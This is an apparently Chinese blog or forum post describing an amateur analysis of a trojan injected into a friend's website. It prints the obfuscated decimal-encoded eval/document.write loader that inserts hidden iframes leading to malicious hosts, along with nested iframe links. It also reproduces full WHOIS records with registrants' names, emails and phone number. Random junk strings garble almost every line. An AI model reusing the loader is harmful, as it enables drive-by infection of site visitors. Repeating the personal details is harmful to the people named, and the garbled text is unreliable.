[原创]一篇刚写的分析木马手记

首发在我的博客里面， XP;x@I#l  
yVS\Q,:J9  
http://www.areway.cn/?p=175 BXhWTGiG  
84
M3c  
<LA^%2jT  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： Hr }k5'  
          SI*^f\lu  
<script>t=’60,105,102,114,97,109,101, <4mQ*6  
32,115,114,99,61,104,116,116,112,58,47,47, Dg2uE8k  
102,114,101,101,46,117,45,117,117,117,46,99, ;&?pd"^<_Z  
110,47,101,114,114,111,114,46,104,116,109, :'*DMW~  
32,119,105,100,116,104,61,49,48,48,32,104, ?63&g{vA  
101,105,103,104,116,61,48,62,60,47,105,102, I]uhi{\C  
114,97,109,101,62′; i&Kz*,pt  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> nY^Nbh0  
                                                                                                  _N'75  
<script>t=’60,105,102,114,97,109,101,32,115, -&Gfh\_NW  
114,99,61,104,116,116,112,58,47,47,102,114, {4rQ7J4Ux  
101,101,46,117,45,117,117,117,46,99,110,47, 2F?kjg,  
101,114,114,111,114,46,104,116,109,32,119, {L0;{
  
105,100,116,104,61,49,48,48,32,104,101,105, nG
rVw&  
103,104,116,61,48,62,60,47,105,102,114,97, /#t&~E_|  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); ("Dv>&w9  
document.write(t);</script> 7X'y>\^w^>  
                                                                                                  ]k+m=OR{/  
<html xmlns=” r4eUZ .8R  
http://www.w3.org/1999/xhtml Z+idLbIs  
“> X+ f9q0  
<head> 97!5Q~I  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> TzM=LvA  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> ?~F. /  
<title>首页 - 爱生活家庭网 #":a6%0Q  
                                                                                                                                                    h~miP7,c<u  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 UK3a{O[5  
转换字符串后的大概内容是（谁点击后果自付）： F2>%KuM  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… Alz~-hqQ  
                                                                                                                                  )=H{5&e#u  
查询玉米u-uuu.cn的详细信息： >oqZ !V5[  
Domain Name: u-uuu.cn H(qm>h$bU  
ROID: 20070901s10001s64972306-cn
p`>d7S>"  
Domain Status: ok _t-7$d"  
Registrant Organization: 王雷 >XE`h9  
Registrant Name: 王雷 aWaw&u  
Administrative Email: czlovexs@126.com y1,5$
0@G  
Sponsoring Registrar: 北京万网志成科技有限公司 \Ph7(ik  
Name Server:ns.yovole.com K$-;;pUl  
Name Server:ns1.yovole.com @"8R3BN  
Registration Date: 2007-09-01 17:54 K{L.ZH>7  
Expiration Date: 2008-09-01 17:54 \P?A7vuhLs  
最后PING了一下地址 都没有什么…. e@jfIF0=}  
                                                                                                25em[Q:  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. uva\0q  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> \ 4gXY$`@  
<script language=”javascript” src=” hC>wF
C  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script \4s;!R!  
> UqtHxEI%R~  
这个玉米应该有可能是木马作者的： }gCHQ;U7`  
foafau.info的详细信息： sh6(z?KP  
Access to INFO WHOIS information is provided to assist persons in |I1+"Mp  
determining the contents of a domain name registration record in the 7/>a:02  
Afilias registry database. The data in this record is provided by `K?1L{p'4  
Afilias Limited for informational purposes only, and Afilias does not Yx1 D)  
guarantee its accuracy.  This service is intended only for query-based Efr&12YSS  
access. You agree that you will use this data only for lawful purposes ?
,% TU&Yn  
and that, under no circumstances will you use this data to: (a) allow,
6%?A>  
enable, or otherwise support the transmission by e-mail, telephone, or ( u f5\}x  
facsimile of mass unsolicited, commercial advertising or solicitations sv=H~wce  
to entities other than the data recipient’s own existing customers; or IVteF*8hU  
(b) enable high volume, automated, electronic processes that send oVkr3KZ  
queries or data to the systems of Registry Operator, a Registrar, or }1m_o@{3P  
Afilias except as reasonably necessary to register domain names or s*JE)  
modify existing registrations. All rights reserved. Afilias reserves n`<U"$*  
the right to modify these terms at any time. By submitting this query, &=zU611,  
you agree to abide by this policy. :_H>SR:  
Domain ID:D22418703-LRMS mo9$NGM&}  
Domain Name:FOAFAU.INFO 0w3
b~RJ  
Created On:20-Nov-2007 16:05:42 UTC u(hC^T1  
Last Updated On:20-Nov-2007 16:05:44 UTC c]v +  
Expiration Date:20-Nov-2008 16:05:42 UTC 5Y-2 #  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) QymD-A"P  
Status:CLIENT DELETE PROHIBITED uaxB -PZ  
Status:CLIENT RENEW PROHIBITED p >aw  
Status:CLIENT TRANSFER PROHIBITED NI\H \#bJ  
Status:CLIENT UPDATE PROHIBITED xOIg|2^8  
Status:TRANSFER PROHIBITED A&l7d0Z^j5  
Registrant ID:GODA-040110615 wLMvC{5  
Registrant Name:liu hong Jpx'W  
Registrant Organization: k4R4YI"jV  
Registrant Street1:beijing *Sb2w*c>  
Registrant Street2: Nza; O[  
Registrant Street3: e\.HWV]I  
Registrant City:beijing &<h?''nCy  
Registrant State/Province: a#QByP  
Registrant Postal Code:100000 `M rBav  
Registrant Country:CN +*a7GttU  
Registrant Phone:+86.860108888777 A& =pw#
 
Registrant Phone Ext.: ND*]gM  
Registrant FAX: [&daG:  
Registrant FAX Ext.: kY!C_kFcn  
Registrant Email:bbbshiji@163.com T*\$<-^
 
Admin ID:GODA-240110615 %MuaW(I o  
Admin Name:liu hong :c<*%*e  
Admin Organization: (UcFNeo  
Admin Street1:beijing 4\1;A`2%0  
Admin Street2: 6 [ _fD  
Admin Street3: o^PuhVu  
Admin City:beijing @g\;` #l  
Admin State/Province: u _X}-U  
Admin Postal Code:100000 5)*6V&  
Admin Country:CN Ky6+~>  
Admin Phone:+86.860108888777 y.ql#eQ,  
Admin Phone Ext.: $_bZA;EMQ  
Admin FAX: l0#4Fma  
Admin FAX Ext.: %/%gMRXG2  
Admin Email:bbbshiji@163.com MCHOK=G  
Billing ID:GODA-340110615 l $w/Fz  
Billing Name:liu hong kp; &cQu!  
Billing Organization: kF2Qv.5!  
Billing Street1:beijing d<v~=  
Billing Street2: @T/qd>T o  
Billing Street3: #%WCL'6B  
Billing City:beijing ,`"K  
Billing State/Province: 4y>(RrVG  
Billing Postal Code:100000 ZM 8U]0[X  
Billing Country:CN b-uZ"Kf^  
Billing Phone:+86.860108888777 i*z0Jf["  
Billing Phone Ext.: V" }*"P-%  
Billing FAX: 1b+h>.gWar  
Billing FAX Ext.: F-tFet  
Billing Email:bbbshiji@163.com dFMAh&:>  
Tech ID:GODA-140110615 `fMpV8vv  
Tech Name:liu hong 22'vm~2E  
Tech Organization: L}b'+Wi@  
Tech Street1:beijing h[,XemwX  
Tech Street2: }{t3SGsJ  
Tech Street3: aPt{C3<  
Tech City:beijing Kk>DYHZ6y  
Tech State/Province: L,W:,i/C
 
Tech Postal Code:100000 90(UgK&Y  
Tech Country:CN u`+'lBE,  
Tech Phone:+86.860108888777 qZP:@r"  
Tech Phone Ext.: UT~4Cfb  
Tech FAX: -`g J  
Tech FAX Ext.: tbS#^Y  
Tech Email:bbbshiji@163.com cPSti  
Name Server:NS27.DOMAINCONTROL.COM @x*.5:[  
Name Server:NS28.DOMAINCONTROL.COM V4Qz*z%  
Name Server: Yq{jEatY{/  
Name Server: 5E0wn'  
Name Server: _trpXkQp  
Name Server: e]Puv)S>{8  
Name Server: ]
.`_, IO  
Name Server: d#4Wj0x  
Name Server: qNy-o\;XN  
Name Server: VH[l\I(h  
Name Server: Z"]xdOre  
Name Server: t)KPp|&  
Name Server: 5Vm Eyb  
                                                                                                          shD+eHo$  
接着下载每个文件里面的代码： OFp#<o,p  
一步一步看.. IE|,~M2  
eA1'qww"'  
/K[]B]1NE  
K` 2i  
!*9FKDB{  
ig+k[`W  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来